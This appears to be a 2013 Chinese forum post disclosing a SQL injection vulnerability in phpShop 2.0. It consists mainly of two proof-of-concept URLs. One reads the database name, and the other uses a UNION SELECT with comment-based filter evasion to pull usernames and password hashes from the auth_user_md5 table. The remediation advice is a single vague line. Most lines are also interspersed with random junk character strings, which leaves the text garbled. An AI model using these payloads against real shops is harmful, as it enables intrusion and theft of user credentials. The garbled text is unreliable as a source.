标题 : phpshop 2.0 SQL Injection Vulnerability& c; D: n$ \# o! J/ ^
% p' s6 ]( h( P6 e9 T
作者 : By onestree) D! t& _. E8 _, w4 w$ y9 H/ y" o# T: T
下载地址 : http://code.google.com/p/phpshop/downloads/list
/ \+ R0 V! v: h% V6 ~ F测试地址: windows 7 / ubuntu# m! N u9 V; F, |& b J- K
; K" P! g. O3 j: c: v1 s
3 c* X( Y9 a/ \. WSQLi p0c:
* e; M% d, \+ a/ `) d) f" a
) j; r- F- J3 A# Q1 K! ~==================
! I/ |; }" Z8 o - n' y# l' _, N( u' [; v
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
8 U* E/ ]: X" S8 @+ D' ounion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --: s3 u1 t6 Y0 n3 b. G
- o6 b9 @; c+ {7 v$ p# @2 X) c2 ^9 c1 o
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--; T" M, k1 t: H" G* l2 D: R
+ G: |% B' B! a7 V( C5 b. V) P
修复:- w% O$ M& g _
加强过滤0 c, b" V7 _+ q/ S
8 ?6 z" I! {; y, n! Y, c4 y
& `& L% I! d: Q7 D' B |
发表于 2013-1-18 18:24:10
收藏
支持
反对